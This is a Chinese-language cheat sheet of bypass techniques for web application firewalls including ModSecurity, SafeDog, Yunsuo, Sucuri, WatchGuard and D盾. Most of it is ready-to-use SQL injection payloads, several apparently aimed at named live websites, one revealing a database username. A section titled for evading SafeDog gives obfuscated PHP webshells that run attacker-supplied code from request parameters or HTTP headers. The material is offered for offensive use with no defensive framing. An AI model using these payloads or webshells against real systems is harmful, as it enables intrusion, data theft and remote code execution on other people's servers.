常见WAF绕过
PHPIDS
0.6.1.1默认规则 :
拒绝:/?id=1+union+select+user,password+from+mysql.user+where+user=1
允许:/?id=1+union+select+user,password+from+mysql.user+limit+0,1
拒绝: /?id=1+OR+1=1
允许: /?id=1+OR+0x50=0x50
拒绝:/?id=substring((1),1,1)
允许: /?id=mid((1),1,1)
Mod_Security
2.5.9默认规则:
拒绝: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
允许: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
拒绝: /?id=1+OR+1=1
允许: /?id=1+OR+0x50=0x50
拒绝: /?id=1+and+5=6
允许: /?id=1+and+5!=6
拒绝: /?id=1;drop members
允许:/?id=1;delete members
/?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')
Modsecurity WAF Bypass vectors
--new version--
id=@:=(-- a %0a select 123 from {ftable})|0.1union-- a %0a select+1,@,3
id=@:=(-- a %0a select 123 from {ftable})*.9union/*!%0aselect 1,@,3*/
id=@:=(%23 a %0a select 123 from {ftable})-\Nunion%23 a %0a select+1,@,3
id=@:=(%23 a %0a select 123 from((table)))/1e0union%23 a %0a select+1,@,3
id=@:=(%23 a %0a select 123 from((table)))/1e0union%a0(select 1,@,3)
--old version--
id=1-.0union distinctrow select 1,2,3from {f table}
id=-1 /*!50000union*/ select 1,2,.3fromtable
id=-1e0union distinct select 1,2,3e0fromtable
id=\Nunion (select 1,2,\Nfrom table)
id=.1union distinct select sql_cache1,2,3 from table
安全狗
/*|--|*/代替空格
/*.*.*.*/ 代替空格。
%1f 绕过空格
/*/#\*/ 代替空格。
/*/*/ 替换空格
http://www.safedog.cn/?id=/*'unionselect 1,2 from users%23*/
http://www.safedog.cn/?id=' -- ' unionselect 1,2 from users%23
http://www.safedog.cn/?id=%20/*%27%20union%20select%20%27*/%27,2%20from%20users%23
/*!50001and*/
/*!50001union*/
/*!50003select*/
/*!50001from*/ 数字不以0结尾
/*!union/*!*/
/*!select/*!*/
过狗SHELL
<?php
$id='xx';
//if (empty($_POST[$id]) &&empty($_GET[$id])) header('HTTP/1.1 404');
$config =array('ynir'=>'type','abvgpahs_rgnrep'=>'crfu');$config =array_flip($config);
$de =function(&$value){$value=strrev(str_rot13($value));};array_walk($config,$de);
@$config['recv'] =isset($_POST[$id])?$_POST[$id]:$_GET[$id];
$fun = function() use ($config){return$config['crfu']('$pa', "{$config['type']}".'($pa);');};
$have = $fun();$have($config['recv']);
?>
<?php
$ab = $_REQUEST['d'];
$a['t'] = "";//主要带对象 D盾就不管后面的了。。。
eval($a['t'].$ab);
<?php$_POST['xx']($_POST['oo']);?>
xx=assert&oo=phpinfo()
<?phpeval(getallheaders()['Accept‐Language'])
<?php$a=getallheaders()['xxx'];$a(getallheaders()['ooo']);>
<?php eval(gzuncompress(base64_decode(getallheaders()['xx'])))
云锁
1.php?id=-1 union(select1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17) (union与select 中间加个“(”)
2.将空格替换成/*/*/
3.?id=/*' union select 1,2 from users%23*/ (把SQL语句写在 /*' */ 里面)
http://www.yunsuo.com.cn/?id=/*' unionselect '*/',2 from users%23
http://www.yunsuo.com.cn/?id=/*%27%20union%20select%20%27*/%27,2%20from%20users%23
Sucuri
最新版sucuri waf绕过
index.php?id=\NUNION(SElecT-1,current_user,3,4,5,6,7,8,9,10,11)---
http://www.uaebf.ae/Press-Release.php?id=189%20and%20@x%20:%3dconcat_ws%280x20%2c%30x6279207a6875746f756767,0x3c62723e,0x56657273696f6e203a3a20,@@global%2eversion,0x3c62723e,0x55736572203a3a20,current_user%29%20having%20.0UnIOn--%20-%0aSeLe%43t~1%2c@%78,~3,~4,~5,~6,~7,~8,~9,~10,%30x27--%20-
http://www.uaebf.ae/Press-Release.php?id=189-length(user())
http://www.uaebf.ae/Press-Release.php?id=189-casewhen user(+) like'uaebf_DuB6Fuser7@localhost' then 1 else 2 end
http://www.uaebf.ae/Press-Release.php?id=189-casewhen right(user(+),1) like 't' then 1 else 2 end
WatchGuard
watchguard WAF绕过
http://aquatlantis.asia/index.php?id=308&amp;amp;tbl=registoshaving0/*!50000union*//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//*!50000select*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,user(),73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160---
Ngx_lua_waf
http://192.168.8.147/test/sql.aspx?id=1UNION/*&ID=*/SELECT null,name,null/*&Id=*/FROM master.dbo.sysdatabases
libinjection
http://test.com/sqli.mysql.php?id=1union select !<1,database() from tables
D盾
http://192.168.8.161/sql.aspx?id=1【Fuzz位置】union selectnull,null,SYSTEM_USER
http://192.168.8.161/sql.aspx?id=1.eunionselect null,null,SYSTEM_USER
结合IIS获取参数位置顺序:GET,POST,COOKIE